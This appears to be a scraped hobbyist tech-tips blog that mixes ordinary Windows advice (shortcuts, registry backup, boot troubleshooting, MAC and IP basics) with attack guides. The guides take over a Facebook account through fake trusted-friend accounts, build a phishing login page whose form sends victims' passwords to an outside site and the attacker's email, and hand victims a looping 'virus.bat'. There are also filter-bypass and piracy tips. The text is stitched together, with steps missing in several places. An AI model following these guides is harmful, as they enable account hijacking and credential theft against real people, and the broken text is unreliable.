Nothing feels good when we can't work properly on our pc because it is invaded by thousands of viruses, worse happens when our cpu shows no sign of even starting up….Daily routine problems ranging from computers to mobiles make our lives motionless in a second… We then regret our lack of knowledge about these subjects….

We are here to help you at this point, we are trying to provide that every little and interesting info about these important things which will prepare you for the upcoming problems in these Fields.. Hope you will enjoy having this piece of knowledge….

PUT UR PROBLEMS ON THE "Problems solved" PAGE ND GET EASY SOLUTIONS..

Google Sms

Subscribe to our Google Sms Channel , to get notifications about new posts and get regular tips and tricks on your mobile .Just sendON Loopholes to 9870807070 or click hereand Get regular updates on your Facebook , just like the Facebook page Click Here

Almost everything is blocked in your college / hostels ... you are not able to download ultrasurf even .

Well there is a solution

You can use Hotspot shield and install it and just run it , rest, it will do it for you , it will automatically open your default browser and will connect to different international proxy servers... and you will be able to open blocked websites in the new tabs .

If you aren't able to download it by yourself just leave your email id ... i will mail you the software orDownload from here .

Check, you will get an international IP , check via "whatismyipaddress.com" .

Most of you must have thought about it many a times..
Changing any folder’s background apart from changing that old desktop
background(wallpaper) daily..

The idea sounds good- You are able to change any folder’s
background to any image which you like..

I will teach you a simple method to do this without using
any software( as softwares, according to hackers are “bad shortcuts for those
who are too lazy to do something interesting” J). You can also
experiment around and change other things related to folders..

The Desktop.ini file

1-So whatever we are going to do here is related to this
hidden and system file named desktop.ini which when opened is a text file and you can
easily edit it.

For this your first task is to enable hidden filesand system filesby going to Tools>Folder options>View>select "Show hidden files and folders"and untick "Hide protected operating system files"

2-Each folder in windows xp will not contain this file by
default. If you want to customize suppose, your folder named “Songs”, you have to go to its properties>customize tab>and do some
customization and then apply it. As soon as you do some customization you
would see the desktop.ini file inside your folder “songs”. So now this is the customization
file for you folder “songs”. Open it.

By default it will contain this text-

[.ShellClassInfo]

IconFile=%SystemRoot%\system32\SHELL32.dll

IconIndex=4

I will specify what all these mean after completing our main
task.

3-So now all you want to do for changing your songs folder
background to a new image named suppose “songback” is this-

Go to these websites and enter the link of the file and it will download it with some other extension , you need to rename its to original extension.( Know how to access blocked sites )

http://txtor.dwerg.net/http://www.underget.com/

In box enter the url of the file .... and rename it with some other extension and download .

2. To Download Torrents....

Using www.torrific.com(That worked for me ) and click on sign up on top-right .

Now copy the url of the torrent by right clicking on download torrent and copy link location...it would be like "name of torrent".TPB.torrent

Paste that in the box and click on get, torrific will tell you if it is already available or in how much time you can get a direct download link...Torrific downloads the file on its server and you download it from torrific .

Another website is http://instant-torrents.com/ about which i can't say much .

Make
your computer speak whatever you type. It’s pretty cool. Just run this script and make it read
any funny sentence.Copy the code given below in notepad and save it as
anyname.vbs. Make sure that you save it as .vbs file.

Dim message, sapi
message=InputBox("What do you want me to say?","Speak to Me")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message

After making a vbs file just double click on that file and type anything you want in the textbox.

Keyboard shortcuts are the essence of PC productivity. While newbs
slowly mouse around their screens in search of buttons to click,
seasoned tech vets hammer through a day’s work with ease thanks to a
wealth of arcane hotkey combos that knock out useful tasks in seconds.
Of course, every PC user knows a few handy shortcuts, and hardened
system tweakers like yourself have forgotten more hotkeys than most
users will ever learn. But here are 10 cool combos that even you might
not know.1. Windows Logo + L

Walking away from the screen for a while? Keep prying eyes out of
your stuff with this quick shortcut that locks the PC instantly. 2. Shift + Delete

The lazy way to delete stuff in Windows is to drag it to the Recycle
Bin. An even lazier way is to highlight the file and press Delete. And
if you’re ultra-lazy (and smarter than the average user), you can bypass
the Recycle Bin entirely by pressing Shift + Delete. The downside is
that you won’t get the opportunity to easily restore the file from the
Recycle Bin if you later decide you want it back, but you also won’t
have to bother emptying the Recycle Bin if you use this method to ditch
unwanted files.3. Windows + Tab

If you’ve got multiple windows open within a given app, this handy
shortcut will let you quickly switch between them, so you don’t have to
waste time clicking around in search of the right window.4. Shift + CTRL + N

Windows 7 made it a little easier to create new folders in Windows
Explorer. Now you can just hit Shift + Ctrl + N in any folder to create a
new untitled folder right where you are. The new folder will appear
with the name ‘New folder’ already highlighted so you can type in your
own name for it and hit Enter to move on to the next task.5. Windows + M

Got a bazillion windows cluttering your screen? Press Windows + M to
instantly minimize all current windows to the Taskbar. It’s a great way
to restore your sanity, and an even better way to hide what you’re
working on from unexpected interlopers. When you want all the windows
back again, press Windows + Shift + M and every currently running window
will pop open again.6. Windows + Spacebar

If you just want to take a quick peek at your desktop (for instance,
to locate a file you’ve dropped there), there’s no need to completely
minimize all your windows with the Windows + M shortcut. Instead, press
Windows + Spacebar, and all of your open windows will turn transparent
so you can see right through them. This even works with maximized
windows and full-screen views. To return your view to normal, simply let
go of the keys.7. Windows + Shift + Left or Right Arrow

If you use a dual-monitor setup to maximize your screen real estate,
you might like to use one monitor as your primary working screen and the
other as a holding pen for active windows. Or maybe you just need to
move a window from one side to the other for some reason. In either
case, hitting Windows + Shift + Left Arrow will move a current window to
from the right display to the left, and using Right Arrow will move it
from the left display to the right. If you only have one monitor, these
commands will dock your window to the designated side of the screen.8. Windows + 1, 2, 3, etc.

Windows 7 introduced a new feature that lets you pin apps to your
Taskbar for quick access. An even quicker way to access those apps is
with this slick keyboard shortcut. Press Windows + 1 to launch the first
pinned app in your Taskbar (from left to right). Windows + 2 launches
the second one, Windows + 3 launches the third one, and so on.9. Windows + T

Windows + number launches pinned apps in your Taskbar, but if your
apps are already open, there’s a quick way to scroll through them. Press
Windows + T and you’ll highlight the first open app in your Taskbar.
Press it again and you’ll move to the second open app. As you scroll
through them, you’ll get a preview box just as you would if you were
hovering over the icon with your mouse. When you get to the app you
want, hit Enter to bring it to the foreground. This shortcut only works
with open apps, and ignores unopened apps that you’ve pinned to your
Taskbar.10. Windows + (+/-)

Want a closer look at whatever’s on your screen? Hit Windows and + to
zoom in for a magnified view. While you’re magnified, moving the mouse
around the screen will move you to the far corners and bring them into
view. Windows and - zooms you back out again.

Note : Only For Educational Purpose , So that you can protect yourself , if someone is hacking your account using this tricks....

Many people keep on searching , how to hack facebook and all ...

Actually we can't hack facebook but we can hack any person's account on facebook , by using some loopholes or creating some .

I am gonna tell you two ways to Hack an Account on Facebook ...

1.Using Facebook Friends Verification Trick....

Step 1 : First of all create 3 email accounts & sign up on facebook using those fake accounts. You must have 3 accounts on facebook and don't forget to confirm them .

Step 2 : Next send a friend request from all the 3 accounts to the victim and you should be clever enough that your requst must be accepted.

Step 3 : You can create an account with a victim friend name and can say its a new account or if he has interest in music /dance anything , you can create an account like music lover etc , and you can create an account with a girl name with an attractive display pic , so any boy will accept :P .

Step 4 : Now go to www.facebook.com and click on “Forgot your password”.
You will need to identify the victim's account by using his Facebook name or Facebook name + Facebook friend's name , Facebook E-mail. When you got the right account , click on "This Is My account".

Step 5 : After that Facebook will suggest to recover password by existing email address. You need to bypass that by clicking on "No longer have access to these"?

Step 6 : Next Facebook will ask a secret question (If the victim has one), you also need to bypass that, by entering the wrong answers three times. After that Facebook will try to help you recover the password by the help of 3 friends and here comes the loophole.

Step 7: Now one by one select the three fake profiles that your victim added to his/her friends.(Fake id must be atleast three weeks old ).

Step 8: After doing this you will get the verification code on your fake profiles, with those 3 codes you can easily change the password.

Note : The fake account must be friend with that person with atleast 3 weeks.& all 3 accounts must not be mutually friends.

For eg:- If you want to hack "A" with your "B" , "C" & "D" accounts then "A" should be friend with "B" , "C" & "D" all and atleast from last 3 weeks and also be careful that "B" , "C" & "D" should not be friends with each other.

2.Using Phishing....

Step 1: Go to www.facebook.com

Step 2: Save the login page of facebook (shortcut:press ctrl+S)

Step 3: Now 2 things would have been saved in your computer with the name "Welcome to Facebook - Log In, Sign Up or Learn More"

Step 4: Right click on the saved file with name "Welcome to Facebook - Log In, Sign Up or Learn More.htm" and open it with notepad

Step 5: Now search where the word action is written in it for the first time (shortcut:press ctrl+F then type action in it and then press enter).

Step 6: Now after action you will see action="https://www.facebook.com/login.php?login_attempt=1" id="login_form"

Step 7: Now replace that line with action="http://hackfact.com/fb.php?id=your-email-id-here@gmail.com&link=www.facebook.com/login.php?login_attempt=1"

Step 8: Now replace the line your-email-id-here@gmail.com with your email-id where you want to receive the password.

Step 9: Save the notepad(shortcut: ctrl+s).

Step 10: Now just put this page on your Desktop who so ever will login from this will be hacked. You will be having his/her password in your email-id or the other option you have is that upload this page on a free web hosting site where you can upload both these pages and if you have your own website you can upload this on that and send the link to others. bingoooooooo..:).

Note: Remember both the files will be moved together which you saved with the name "Welcome to Facebook - Log In, Sign Up or Learn More" and you can rename the file with the name "Welcome to Facebook - Log In, Sign Up or Learn More.htm" but not that folder.

This trick was for educational purpose only and the preventive measure is that always see the URL of the site(Complete URL if site has url www.facebook.com.hackfact.com then also its fake not genuine.).

and third method is Using Key-loggers but it will work only if you are able to install that keylogger on the victim pc , which is not possible in most of cases .

Source : www.hackfact.com , give it a visit also... many more tricks by my friend ....

As the size of hard drives increase, more people are using
partitions to separate and store groups of files.

XP uses the C:\Program Files directory as the default base
directory into which new programs are installed. However, you can change the
default installation drive and/ or directory by using a Registry hack.

Go to :-

-Start > Run

-Type <regedit>.Press
Enter.

- Go to this directory…

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion

-Look for the value named ProgramFilesDir. ,this value will be C:\Program Files. Edit the
value to any valid drive or folder and XP will use that new location as the
default installation directory for new programs.

1. Make a folder named loopholes in c: drive .
2. Now copy an image (behind which you wanna hide the data)to this folder , say image.jpg .
3. Now copy all the data in that folder and select them and right click and select add to loopholes.rar as shown .

4. Now go to run type cmd .Press Enter.
5. In command prompt type the following commands...

cd c:\loopholes
copy /b image.jpg + loopholes.rar image.jpg

6. Now its done , you will see that the size of your image has increased , you can delete the data you copied in that folder and also the loopholes.rar file .

7. Now if you wanna view the data you can open that file in Winrar and you can extract it to get the data back .

A MAC address, or Media Access Control address, is a address associated
with a network adapter. While IP addresses are associated with software,
MAC addresses are linked to the hardware of network adapters. For this
reason, the MAC address is sometimes called the physical address or the
hardware address. MAC addresses are expressed in hexadecimal notation in
the following format: 01-23-45-67-89-AB. (:) are sometimes used instead
of dashes (-).
MAC addresses are often considered permanent as they are hardware
address which is assigned by manufacturer itself, but in some
circumstances, they can be changed.

There are two types of MAC addresses:

1.Locally Administered Address
The LAA(Locally Administered Address) is an address that changes an
adapter's MAC address. The LAA is a type of administered MAC address,
and it is possible to change the LAA of a network adapter to any address
of allowed length. When the LAA is set, the network adapter uses the
LAA as its MAC address. Otherwise, network adapter uses the
UAA(Universally Administered Address) as its MAC address. All devices on
the same subnet must have different MAC addresses, however. MAC
addresses are very useful in diagnosing network issues, such as
duplicate IP addresses, so it is a good practice to allow devices to use
their UAAs instead of assigning LAAs.
2.Universally Administered Address
The UAA(Universally Administered Address) is the most commonly used type
of MAC address. This address is assigned by the manufacturer to the
network adapter. The first three octets define the manufacturer, while
the second three octets vary and identify the individual adapter. All
network adapter manufacturers have their own code, called the
Organizationally Unique Identifier (OUI). For example, in the MAC
address 00-14-22-00-40-96, the first three octets 00-14-22 for Dell
00-40-96 for Cisco.
MAC addresses are useful for security purposes, as they are only rarely
changed from the default. IP addresses can change dynamically,
especially on networks using DHCP to assign IP addresses, so MAC
addresses are often a more reliable way to identify senders and
receivers of network traffic. On wireless networks, MAC address
filtering is a common security measure to prevent unwanted network
access.

how to check MAC address

Go to run type cmd and enter " getmac "
You will find you MAC address .....

An IP
address is a fascinating product of modern computer technology designed
to allow one computer (or digital device) to communicate with another
via the Internet. IP addresses allow the location of literally billions
of digital devices that are connected to the Internet to be pinpointed
and differentiated from other devices. In the same sense that someone
needs your email-id to send you a letter, a remote computer needs your
IP address to communicate with your computer.

You can also say that IP-address is similar to name in humans.
Humans use name to identify each other similarly in computers we have IP-address

"IP" stands for Internet Protocol, so an IP address is an Internet
Protocol address. What does that mean? An Internet Protocol is a set of
rules that govern Internet activity and facilitate completion of a
variety of actions on the World Wide Web. Therefore an Internet Protocol
address is part of the systematically laid out interconnected grid that
governs online communication by identifying both initiating devices and
various Internet destinations, thereby making two-way communication
possible.

An IP address consists of four numbers, each of which contains one to
three digits, with a single dot (.) separating each number or set of
digits. Each of the four numbers can range from 0 to 255. Here's an
example of what an IP address might look like: 78.125.0.209. This
innocuous-looking group of four numbers is the key that empowers you and
me to send and retrieve data over our Internet connections, ensuring
that our messages, as well as our requests for data and the data we've
requested, will reach their correct Internet destinations. Without this
numeric protocol, sending and receiving data over the World Wide Web
would be impossible.
Go to run and type cmd .In cmd enter ipconfig and you will find your ip address .

black hat hacking

A black hat is the villain or bad guy, especially in a western movie in
which such a character would wear a blackhat in contrast to the hero's
white hat.Black hat is used to describe a hacker (or, if you prefer,
cracker) who breaks into a computer system or network with malicious
intent.the black hat hacker takes advantage of the break-in, perhaps
destroying files or stealing data for some future purpose.They are the
ones that hack illegally the brake in to some one elsis pc and well you
know the rest.The black hat hacker takes advantage of the break-in,
perhaps destroying files or stealing data for some future purpose.
The phrase is often used figuratively, especially in computing slang,
where it refers to a computer security hacker that breaks into networks
or computers, or creates computer viruses.

grey hat hacking

A grey hat, in the hacking community, refers to a skilled hacker whose
activities fall somewhere between white and black hat hackers on a
variety of spectrums. It may relate to whether they sometimes arguably
act illegally, though in good will, or to how they disclose
vulnerabilities. They usually do not hack for personal gain or have
malicious intentions, but may be prepared to technically commit crimes
during the course of their technological exploits in order to achieve
better security.

White hat hacking

White hat(computer security), a computer hacker intending to improve security
White hat (film), a hero character.
A white hat hacker are like the jedi i cyberspace they track down black
hats and get rid of them. nothing a white hat does is illegal. also a
White hat can be hired to test out the security and if there are any
bugs they fix them or they can be hired to protect a ceratin server. so
do you see black bad white good.

Hacking as a career

Individuals, government and companies are nowadays highly dependent on
the Internet. However, most of them still remain unaware of the various
risks of cyber crime and fraud. With a growth in computer users and
networks, the scale and sophistication of cyber crimes has increased as
well - hence creating a high demand for Ethical Hackers. The job of an
Ethical Hacker is to get into the minds of computer criminals, think
like them and come up with innovative methods to protect network ,
computers and data. Companies hire ethical hackers to find out any
vulnerability that might exist in their network and to find out how to
fix them, so that these companies can secure their valuable online data.

The demand for Cyber Security experts is booming across the world.
Especially after the recent attacks, Chinese cyber attacks on different
countries and bomb blasts in various parts of the world, people have
woken up to realize the importance of cyber security experts. And hence
choosin hacking as career has become a good option.
Ethical Hacking has already become one of the hottest career
opportunities available. Nowadays, all organizations including banks,
Internet companies, airlines, hotels, telecom companies, police
departments, ITES companies, retail chains, government agency and other
companies need Cyber Security experts to protect themselves.

The demand for cyber security experts is rising at a tremendously high
rate in the world over. According to a recent NASSCOM report on
IS(Information Security) Manpower Demand Estimation- "As per IDC, the
worldwide demand for IS Services was approximately $8 billion in 2001,
estimated was about $23.6 billion by 2006.Correspondingly, there is a
growing demand for IS professionals which is expected to be very good in
the years of 2012 and so on.

Hacking is the art of creative problem solving, whether that means
finding an unconventional solution to a difficult problem or exploiting
holes in sloppy programming. Many people call themselves hackers, but
few have the strong technical foundation needed to really push the
envelope

Most people associate hacking with breaking the law and assume that
everyone who engages in hacking activities is a criminal. Granted, there
are people out there who use hacking techniques to break the law, but
hacking isn't really about that. In fact, hacking is more about
following the law than breaking it. The essence of hacking is finding
unintended or overlooked uses for the laws and properties of a given
situation and then applying them in new and inventive ways to solve a
problem , whatever it may be.

Hacking tends to be a misunderstood topic, and the media likes to
sensationalize, which only exacerbates this condition. Changes in
terminology have been mostly ineffective-what's needed is a change in
mind-set. Hackers are just people with innovative spirits and an
in-depth knowledge of technology. Hackers aren't necessarily criminals,
though as long as crime has the potential to pay, there will always be
some criminals who are hackers. There's nothing wrong with the hacker
knowledge itself, despite its potential applications.

How does one distinguish between the good hackers who bring us the
wonders of technological advancement and the evil hackers who steal our
credit card numbers? The term cracker was coined to distinguish evil
hackers from the good ones. Journalists were told that crackers were
supposed to be the bad guys, while hackers were the good guys. Hackers
stayed true to the Hacker Ethic, while crackers were only interested in
breaking the law and making a quick buck. Crackers were considered to be
much less talented than the elite hackers, as they simply made use of
hacker-written tools and scripts without understanding how they worked.
Cracker was meant to be the catch-all label for anyone doing anything
unscrupulous with a computer & pirating software, defacing websites,
and worst of all, not understanding what they were doing. But very few
people use this term today.

1.Using Folder attributes
Copy all of your data in a folder.
Now go to cmd by typing cmd.exe in run box and use the command ...

"attrib +S +H d:/folder "

It will hide the data and make it system also .
But if other person has enabled viewing of Hidden and system files from folder options then he/she can view your folder .

To remove these attributes you can use
"attrib -S -H d:/folder"

2. You can create a folder with no name and no icon .
To do this rename a folder and press Alt+0160(fron numpad) , it will create a folder without any name .
Now go to propeties of that folder and click on Customize tab and click change icon and you will see a box full of icons slide it to right you will see few blank spaces ... select any one of them and ok and apply .

You will get a folder without any name and icon .
and you can change its attrib also as told in 1 .

3.This is the best way using Disk Management .

Go to run... type diskmgmt.msc .

First of all create a new partion by shrinking any drive (Know how to shrink and create new partion ) and now put your data which you wanna hide into that partition.
Now in disk management right click on the partition box in which that data is present ,
and click on Change Drive letter or path , after that select the drive letter and click on remove and ok .
Ignore any Warning and be careful not to do this with C drive .

You will see that ,that partition has become invisible in My computer ..

To enable it back you can go back to diskmgmt.msc and select that partion and Change Drive letter or path and add a drive letter ... you will see a partion in my computer with that drive letter and data .

4-Save it or Press Ctrl+S .5-Give anyname with extention as ".bat " for eg:- virus.bat
6-Send this file to your victim and ask him to click on it ......& done ..:) or you give it in pendrive and attach in autorun , so it will run automatically .
Trick :- What we have actually done here....
md=make directory(which tells to create a folder with a name "New folder"
cd=change directory(on creation of new directory it goes into that directory)
and goto loopholes simply makes a loop so that command will run again and again infinitely .

How to add safe mode to your boot list in Windows XP

Safe mode is required when you have to fix a problem such as virus infection
or uninstalling drivers in your windows XP. generally we need to use F8 Key to
get into safe mode and if not timed properly you will need to restart windows
xp again. Here is a small trick which lets you add Safe mode by default into
your Boot list. You will see it when you restart your windows xp machine.

Steps to Add Safe Mode in Boot list

Go to control panel >
System.

Click on Advanced Tab.

Then click on settings under
the startup and recovery action.

Click on edit under system
startup to indirectly edit your boot.ini file.

Microsoft Windows stores its configuration information in a
database called the registry.The registry is the central
storage for all computer configuration data. The Windows system
configuration, the computer hardware configuration, information about
installed programs, the types of documents that each program can
create, and user preferences are all stored in the registry. Windows
continually references this information during its operation. The
registry stores the data in a structured hierarchy of keys, subkeys,
and named values. Incorrectly editing the registry may severely damage
your system. Microsoft recommends that you backup the registry before
you edit it.

Although the registry appears to be in one file, it is actually
placed on your computer in several files. Depending on your system
configuration, registry files can be found in any of the following
locations:

How to back up Windows registry?

METHOD 1

Unfortunately, it is not possible to back up registry files under
Windows NT, 2000, XP, Vista, and 7, while the operating system is running.
Registry files remain fully locked all the time while Windows is
running, so there is no access to those files. You can however use an
integrated Windows' System Restore feature for
registry backup.However its better not to use this method if u
have less space in c: drive, as system restore function takes a lot of a space
So disable this function and use the other method instead

Manual steps to back up the registry in Windows XP

On the Welcome to System
Restore page, click Create a restore point, and then click Next
.

On the Create a Restore
Point page, type a name for the restore point and then click Create

After the restore point has
been created, click Close.

Note If System Restore is turned off, you receive a message that asks
whether you want to turn on System Restore now. Click Yes.
Then, in the System Properties dialog box, click to clear the Turn
off System Restore check box, click OK, and then
repeat this step.

Manual steps to restore the registry in Windows XP

Use System Restore to undo registry changes in in Windows XP

On the Welcome to System
Restore page, click Restore my computer to an earlier time
(if it is not already selected), and then click Next .

On the Select a Restore
Point page, click the system checkpoint. In the On this list
select the restore point area, click an entry that is named
"Guided Help (Registry Backup)," and then click Next.
If a System Restore message appears that lists configuration changes that
System Restore will make, click OK.

On the Confirm Restore
Point Selection page, click Next. System Restore
restores the previous Windows XP configuration and then restarts the
computer.

Log on to the computer. When
the System Restore confirmation page appears, click OK..

METHOD 2

Alternatively, the registry editor (regedit.exe) allows you to
export partial or complete copies of the registry, while the Windows
is up, and the exported files can then be backed up with
Argentum™ Backup or any other traditional file backup utility. If
there is a registry problem, the exported file can be easily imported
to restore all or part of the registry. And the exported file is a
text file that's easily read and manipulated. You can follow these
simple steps to back up the whole registry or any particular registry
subkey:

Click Start, and then click Run.

In the Open box, type regedit, and then click OK.

Locate and then click the root subkey that contains all the child subkeys and values that you want to back up.

On the File menu, click Export.

In the Save in box, select a location where you want to save the
Registration Entries (.reg) file, type a file name in the File name box,
and then click Save.

The exported registry file is about 50-100 MB in size on a typical
Windows XP/Vista/7 installation. The registry exported files are
text files and are usually well-compressed (by up to 75% and more).
You can use Argentum™ Backup to automatically compress and save them
in Zip archives. To restore registry subkeys that you exported,
double-click the Registration Entries (.reg) file that you saved.As opposed to Windows XP, Vista, and 7, registry backup is very
easy when running Windows 95, 98, and ME, and it can be fully automatic.
You can back up registry files either manually, by hand, or fully
automatically, with the help of Argentum™ Backup. It will find the
correct locations and back up all of your registry data automatically,
quickly and safely.

If windows 7 is installed in your computer and it is Some Basic edition like Home , Professional
You can upgrade it to windows 7 ultimate in 2 minutes , without installing or losing any data .

1. Go to Properties on My Computer .
2. Here at the top you will see Windows Edition and below that there will be "Get New features with another version of windows" option .
3.Click on Upgrade , it will ask for a key , so Enter the key given below

4. Now click on next, it will restart your computer & will upgrade your windows to Windows 7 Ultimate .

1. Let us suppose, you have home premium dvd and you wanna install ultimate version .2. Create the iso file of the dvd . ( Know How ??)3. Now open that iso and you will find a "sources" folder in it .4. In the sources folder there will be a file named "ei.cfg" .5. Delete that file from the iso .6. Now burn that iso on a dvd or on a pendrive ( how to use pendrive to install windows )7. Boot the dvd and during installation it will ask which version to install like home premium , professional , ultimate .

1. Download Magic Iso from here and install it .
2. Now insert your dvd.
3. Right click on your DvD you will see a magic iso option , drag cursor on it .
4. Now click make image file from G:/ ( here G is your dvd drive name )

5. You will see a box like this .

6. Now select iso in the output format and in the output box select the path where you wanna save the iso
7. Click ok , it will create the iso file .
8. You can also edit an iso using the Magic iso , open the iso file with Magic iso and edit .

Start your computer and a
message comes up: "Insert bootable media," which means that your
computer, whatever system is running, has failed to boot normally. If
you want to use your os, you had better do something and
find out the reason. There are a few reasons why this has happened, but don't
worry. Think calmly, follow these steps and you can get to the root
cause fast.

Why This Message Shows

The message means that, after
the computer POST (power on system test), the computer cannot find an
operating system. Finding an operating system will depend on which
operating system is installed. If it is a Windows XP system it is
looking for NTDETECT.COM, BOOT.INI and an assortment of files that
determine what happens when Windows boots. If it is a LINUX system, it
will be looking for a bootloader like LILO (Linux Loader) or GRUB (Grand
Unified Bootloader), which passes control to the LINUX kernel. Then the
system starts up with the user's choice of startup programs that form
the desktop applications. This process is the same for both Linux and
Windows.
The term "boot" comes from the idea of "pulling the bootstraps on" the
system---in computer parlance, a way of describing the system startup.
This terminology stuck after first being coined by computer engineers
during the beginning days of computer systems.

What the Boot Process Involves

After the POST, the system
searches for a boot device; commonly, a bootable partition on a hard
disk, a CD-ROM or floppy disk, in that order nearly every time. It can
also be a network device or a USB or flash memory card. Many of Cisco's
internet
work devices are started from cards plugged into the front of
the machine. So, if one of these devices fail, the same message, "Insert
bootable media," will display on the booting screen of whatever machine
is attempting to start. If the hard drive loses its partition
information, this is one of the scenarios leading to this message. If
the files used for startup are corrupted in any way, this is another
reason for the message. The way of correcting this is to complete the
system startup with an alternative boot device (See Resources), and,
once booted, search for reasons why the system failed to boot from the
normal boot device (in most cases the hard drive). Some of these
resources also have tools to rescue booting files that are missing or
bad. Another reason could be that the user left a disk in a drive and
the machine is set (in the BIOS) to boot from that media first. This
could be a floppy disk or a CD/DVD ROM. And the reason it does not work
is because the floppy or CD/DVD does not contain a boot record. The
simple remedy is to remove the floppy, CD or DVD and start again.

How Windows XP Loads Itself

NTLDR is the loader for the
Windows NT operating system. After it has accessed the file system,
which can either be NTFS or FAT32, it looks for the presence of a file
called HIBERFIL.SYS which is used if the user hibernated the PC. If so,
NTLDR loads from HIBERFIL.SYS and the system comes back up from where it
left off at the end of the previous session. Otherwise, it looks
directly at BOOT.INI for information where to boot (including
non-Windows NT operating systems like Linux or MS-DOS). Next, if a
Windows NT operating system is selected, it runs NTDETECT.COM, which
loads information about the hardware. Finally, it passes control to
NTOSKRNL.EXE, sending to it the information returned by NTDETECT.COM.

Non-Booting Scenarios and Ways to Avoid Them

There are other reasons why a
machine will not boot. One of them is a corrupted system registry. This
will generally not give the same error message. However, a direct reason
for corrupted system startup files is the lack of space on the primary
hard drive. So it is a good idea not to let the hard drive's free space
fall below 25 percent. Another reason would be the beginning of failure
of the hard drive's physical sectors, causing a failure of the system
files needed to boot the drive. Missing any of the critical files
required to boot Windows is like having a missing piece of a jigsaw
puzzle.

Many Video Games like Play station 1 etc , uses a gun to play a game like duck hunt etc . Ever imagined how the gun works and duck dies .

Actually , gun barrel contains a photo diode (or photo transistor) . which is able to sense light coming from the TV screen. Gun also have a trigger switch. The output of the photo diode and switch are fed to the computer (play station ) controlling the game.

Simultaneously, computer is receiving signals from the screen driver electronics. As you know in a Television ,the horizontal retrace & vertical retrace signals are used to align the picture on the screen. The screen driver electronics send pulses to the computer at the start of the horizontal and vertical retrace signals, by this the computer knows where on the screen the electron beam is located during each frame.

The gaming device normally uses one of two different techniques to find out whether the gun is pointed at the target when the user pulls the trigger or not .

The computer blanks the screen & paints just the target object white. If the photo diode senses darkness after one vertical retrace signal and then light after the next, the computer assumes that the gun is pointed at the target and scores a hit.

The computer blanks the screen and then paints the entire screen white. It takes time for the electron beam to trace the entire screen while painting it white. On comparing the signal coming from the photo diode with the horizontal and vertical retrace signals, the computer detects where the electron beam is on the screen when the photo diode first senses its light. The computer counts the number of microseconds that pass between the time the horizontal and vertical retrace signals start and the time the photo diode first senses light. The number of microseconds tells the computer exactly where on the screen the gun is pointing. If the calculated position and the position of the target match, the computer scores a hit.

2 Installing Windows from pendrive if you have Setup files and not iso or you can extract the iso .

1.Now go to the Windows setup files and go to boot folder and copy bootsect.exe to your c:
2.Now copy the whole operating system instalation files on your pendrive .(Your pendrive must be Fat32 formatted)
3.Now go to run , type cmd
4.Now type cd .. and cd.. untill you reach C :/
5 Exexute command bootsect.exe /nt60 I:
6.Where I is the path of your pendrive .
7. Now boot through pendrive and install OS .
8.The syslinux tool will create a hidden system file named bootmgr on the Flash and make the drive bootable

3. Installing or running Live Linux from pendrive if you have Setup files and not iso or you can extract the iso .

1.You need to download syslinuxnew.exe from here .
2. Copy the syslinux.exe in to your C:/
3. Extract the iso and place the files in pendrive . ( Formatted in Fat32)
4. Now if any folder with name isolinux exists then rename it to syslinux and in that folder there will be a file isolinux.cfg rename it to syslinux.cfg
5. Now go to run , type cmd and enter
6. Go to your C:/ using " cd .. " command
7. Now run this command without quotes " syslinuxnew.exe -ma I:/ " ( here I:/ is the drive letter of your pendrive )
8. Now you can restart and boot via your pendrive .
9.The syslinux tool will create a hidden system file named ldlinux.sys on the Flash and make the drive bootable

1. Go to start and type cmd and right click on it and run as adminstrator .

2. Now type " net user administrator active:yes " without quotes
3 This will enable the administrator account which is super user .
4 Now reboot your system and you will see one more account on the login screen , just login in it and you will have all the privelleges .

1 Click on Windows start button in taskbar .
2 Now in the box type cmd , you will see cmd.exe
3 Right click over it and run as administrator .

4 Now browse to your C:/ by using "cd .. " without quotes
5 now type del /F /A "Windows old" (after typing W of windows old press tab twice or more , you will see windows old folder ) and enter .
6 Then it will ask are you sure press y and enter .

7 It will delete all the files from windows old folder .

3 .OR you can use security tab ...

1. Right click on the Windows Old folder and go to propeties .
2 Now click on security tab and click on Edit
3 Select Administrator and Below in Permissions Box , Tick on Full Control and OK .
4 Now you can delete that folder .

Tips & Tricks

For every resolution, select the highest refresh rate to avoid strain on ur eyes- right click on desktop-properties-settings-advanced-monitor-check hide modes that this monitor cannot display-now select highest rate from drop down